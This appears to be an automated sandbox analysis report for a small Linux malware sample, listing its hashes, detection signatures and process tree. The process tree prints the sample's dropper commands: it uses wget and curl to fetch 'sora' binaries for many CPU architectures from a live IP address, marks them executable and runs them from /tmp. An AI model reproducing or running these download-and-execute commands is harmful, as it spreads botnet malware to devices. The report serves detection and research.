Analysis
- max time kernel: 30s
- max time network: 31s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240226-en
- resource tags: arch:mips image:debian9-mipsbe-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system
- submitted: 28-03-2024 10:06

Static task
- static1

Behavioral task
- behavioral1
  - Sample: 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
  - Resource: ubuntu1804-amd64-20240226-en
- behavioral2
  - Sample: 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
  - Resource: debian9-armhf-20240226-en
- behavioral3
  - Sample: 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
  - Resource: debian9-mipsbe-20240226-en
- behavioral4
  - Sample: 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
  - Resource: debian9-mipsel-20240226-en

General
- Target: 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
- Size: 1KB
- MD5: 02ca1bec2de42845c35867af0dc72be3
- SHA1: d2fc439476dd4ec34fce01257762a34b0aa6f3d5
- SHA256: 848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54
- SHA512: 302e57020da9a74ee02c1f39c81aacb5a4385cedb7a0323ee3ba208d8e58fe5abdf83e2975bc8416ba684e164a512420b550f15569f3243f39a00d4cd99a3dc7
Malware Config
Signatures
- Executes dropped EXE (10 IoCs)
  Processes:
    ioc          pid  process
    /tmp/robben  740  robben
    /tmp/robben  747  robben
    /tmp/robben  754  robben
    /tmp/robben  760  robben
    /tmp/robben  766  robben
    /tmp/robben  777  robben
    /tmp/robben  793  robben
    /tmp/robben  808  robben
    /tmp/robben  828  robben
    /tmp/robben  844  robben
- Reads runtime system information (10 IoCs)
  Reads data from /proc virtual filesystem.
  Processes:
    description               ioc                             process
    File opened for reading   /proc/sys/crypto/fips_enabled   curl   (10 occurrences, one per curl process)
- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  Processes:
    description                    ioc
    File opened for modification   /tmp/robben
Processes (image: command line [signatures]; indentation shows process depth)
- /tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118: /tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
  - /usr/bin/wget: wget http://188.127.235.211/bins/sora.x86
  - /usr/bin/curl: curl -O http://188.127.235.211/bins/sora.x86 [Reads runtime system information]
  - /bin/cat: cat sora.x86
  - /bin/chmod: chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
  - /tmp/robben: ./robben Payload [Executes dropped EXE]
  - /usr/bin/wget: wget http://188.127.235.211/bins/sora.mips
  - /usr/bin/curl: curl -O http://188.127.235.211/bins/sora.mips [Reads runtime system information]
  - /bin/cat: cat sora.mips
  - /bin/chmod: chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
  - /tmp/robben: ./robben Payload [Executes dropped EXE]
  - /usr/bin/wget: wget http://188.127.235.211/bins/sora.mpsl
  - /usr/bin/curl: curl -O http://188.127.235.211/bins/sora.mpsl [Reads runtime system information]
  - /bin/cat: cat sora.mpsl
  - /bin/chmod: chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
  - /tmp/robben: ./robben Payload [Executes dropped EXE]
  - /usr/bin/wget: wget http://188.127.235.211/bins/sora.arm4
  - /usr/bin/curl: curl -O http://188.127.235.211/bins/sora.arm4 [Reads runtime system information]
  - /bin/cat: cat sora.arm4
  - /bin/chmod: chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
  - /tmp/robben: ./robben Payload [Executes dropped EXE]
  - /usr/bin/wget: wget http://188.127.235.211/bins/sora.arm5
  - /usr/bin/curl: curl -O http://188.127.235.211/bins/sora.arm5 [Reads runtime system information]
  - /bin/cat: cat sora.arm5
  - /bin/chmod: chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
  - /tmp/robben: ./robben Payload [Executes dropped EXE]
  - /usr/bin/wget: wget http://188.127.235.211/bins/sora.arm6
  - /usr/bin/curl: curl -O http://188.127.235.211/bins/sora.arm6 [Reads runtime system information]
  - /bin/cat: cat sora.arm6
  - /bin/chmod: chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
  - /tmp/robben: ./robben Payload [Executes dropped EXE]
  - /usr/bin/wget: wget http://188.127.235.211/bins/sora.arm7
  - /usr/bin/curl: curl -O http://188.127.235.211/bins/sora.arm7 [Reads runtime system information]
  - /bin/cat: cat sora.arm7
  - /bin/chmod: chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
  - /tmp/robben: ./robben Payload [Executes dropped EXE]
  - /usr/bin/wget: wget http://188.127.235.211/bins/sora.ppc
  - /usr/bin/curl: curl -O http://188.127.235.211/bins/sora.ppc [Reads runtime system information]
  - /bin/cat: cat sora.ppc
  - /bin/chmod: chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
  - /tmp/robben: ./robben Payload [Executes dropped EXE]
  - /usr/bin/wget: wget http://188.127.235.211/bins/sora.m68k
  - /usr/bin/curl: curl -O http://188.127.235.211/bins/sora.m68k [Reads runtime system information]
  - /bin/cat: cat sora.m68k
  - /bin/chmod: chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
  - /tmp/robben: ./robben Payload [Executes dropped EXE]
  - /usr/bin/wget: wget http://188.127.235.211/bins/sora.sh4
  - /usr/bin/curl: curl -O http://188.127.235.211/bins/sora.sh4 [Reads runtime system information]
  - /bin/cat: cat sora.sh4
  - /bin/chmod: chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben
  - /tmp/robben: ./robben Payload [Executes dropped EXE]